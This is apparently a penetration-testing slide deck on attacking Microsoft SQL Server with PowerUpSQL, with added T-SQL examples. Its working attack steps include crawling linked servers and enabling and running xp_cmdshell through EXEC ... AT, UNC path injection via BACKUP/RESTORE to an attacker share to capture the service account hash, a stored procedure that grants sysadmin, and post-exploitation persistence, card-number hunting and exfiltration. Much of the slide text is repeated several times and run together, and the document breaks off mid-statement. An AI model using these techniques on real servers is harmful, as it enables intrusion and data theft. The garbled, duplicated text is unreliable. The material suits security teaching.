Get-SQLServerLinkCrawl: Crawls linked servers and supports SQL query and OS command execution
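Manual link enumeration and the two ways a statement leaves through a link (query via OPENQUERY, command via EXEC ... AT), which is what Get-SQLServerLinkCrawl automates hop by hop. This is an added example, not from the original deck or from PowerUpSQL; the link names SQLSERVER2 (a link on the local server) and SQLSERVER3 (a link defined on SQLSERVER2) are assumptions. Nothing here needs more than the public role on the local server.

```sql
-- Added example (not from the original deck). Assumed link names: SQLSERVER2
-- (defined locally) and SQLSERVER3 (defined on SQLSERVER2).

-- 1. Which links exist and what do they log in as? A link whose login mapping
--    has local_principal_id = 0 (applies to every local login) and a fixed
--    remote_name such as sa is the escalation path; uses_self_credential = 1
--    just forwards the caller's own identity and gains nothing.
SELECT s.name              AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,                -- needed for EXEC ... AT below
       ll.local_principal_id,               -- 0 = mapping applies to all logins
       ll.remote_name,                      -- fixed remote login, NULL if none
       ll.uses_self_credential
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Who are we on the other side? (the OPENQUERY form from the slide)
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name,
            IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Crawl one hop further with nested OPENQUERY: the inner query text is a
--    string inside a string, so every level doubles the quotes once more.
SELECT * FROM OPENQUERY([SQLSERVER2],
    'SELECT * FROM OPENQUERY([SQLSERVER3],
        ''SELECT @@SERVERNAME AS srv, SYSTEM_USER AS login_name'')');

-- 4. Run a command rather than a query. This needs the link's RPC Out option
--    (is_rpc_out_enabled = 1) and a remote login that can enable and run
--    xp_cmdshell, i.e. the "DB link with SA account" case from the diagram.
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQLSERVER2];
EXEC ('sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')           AT [SQLSERVER2];
EXEC ('xp_cmdshell ''whoami''')                                   AT [SQLSERVER2];
```

Step 1 doubles as the defender’s inventory: every row with a fixed remote_name that is sysadmin on the remote side, reachable by all local logins, is a path that any domain user with a login on this instance can walk.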
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands; the SQL Server service account then connects to the attacker’s share to open the file:
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default: the connection to the attacker’s share carries the service account’s NetNTLM challenge/response, which can be cracked offline or relayed
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It’s self-descriptive
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
(BUILTIN\Administrators stopped being a default sysadmin login in SQL Server 2008, and NT AUTHORITY\SYSTEM in SQL Server 2012, which is why those two rows end where they do)
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach / Common Tools
Access as Local Administrator: Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem: Psexec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from the SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview
1. Establish Persistence
  • SQL Server layer: startup procedures, agent jobs, triggers, modified code
  • OS layer: registry and file auto-runs, scheduled tasks, services, etc.
2. Identify Sensitive Data
  • Target large databases
  • Locate transparently encrypted (TDE) databases
  • Search columns based on keywords and sample data
  • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
  • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
• The public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default
Escalating Privileges: UNC Path Injection
But who really has PUBLIC role access?
Oh yeah, a ton of domain users
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive.
Escalating Privileges: UNC Path Injection
DEMO
Escalating Privileges: OS Admin to SysAdmin
Escalating Privileges: OS Admin to SysAdmin
Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin
Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x
Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin
Here are some tool options
Approach / Common Tools
Access as Local Administrator: Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem: Psexec, accessibility options, debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets: Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process: Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process: Metasploit Incognito, Invoke-TokenManipulation
Single User Mode: DBATools
Common Post Exploitation Activities
Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
• SQL Server layer: startup procedures, agent jobs, triggers, modified code
• OS layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
• Target large databases
• Locate transparently encrypted databases
• Search columns based on keywords and sample data
• Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
• All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
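The Luhn check from step 2, as an added T-SQL example (not from the deck or from PowerUpSQL): a function that validates a 13 to 19 digit candidate, applied to a constructed three-row sample of the kind of column values a keyword search surfaces.

```sql
-- Added example, not from the deck or PowerUpSQL. Sample rows are constructed.
CREATE FUNCTION dbo.fn_luhn_valid (@candidate nvarchar(64))
RETURNS bit
AS
BEGIN
    -- Sampled card numbers are often stored with spaces or dashes; remove them first.
    DECLARE @digits nvarchar(64) = REPLACE(REPLACE(@candidate, ' ', ''), '-', '');
    -- Anything that is not 13 to 19 pure digits is not a PAN candidate at all.
    IF @digits LIKE '%[^0-9]%' OR LEN(@digits) NOT BETWEEN 13 AND 19
        RETURN 0;

    DECLARE @sum int = 0, @pos int = LEN(@digits), @double bit = 0, @d int;
    -- Walk from the rightmost digit: every second digit is doubled, and a doubled
    -- value above 9 has 9 subtracted (the same as summing its two digits).
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS int);
        IF @double = 1
        BEGIN
            SET @d = @d * 2;
            IF @d > 9 SET @d = @d - 9;
        END;
        SET @sum = @sum + @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos = @pos - 1;
    END;
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END;
GO

-- Constructed sample of values a keyword search on column names might surface.
DECLARE @sample TABLE (id int, col_value nvarchar(64));
INSERT INTO @sample VALUES
    (1, N'4111 1111 1111 1111'),   -- the well-known Visa test card number
    (2, N'4111-1111-1111-1112'),   -- same number with its last digit changed
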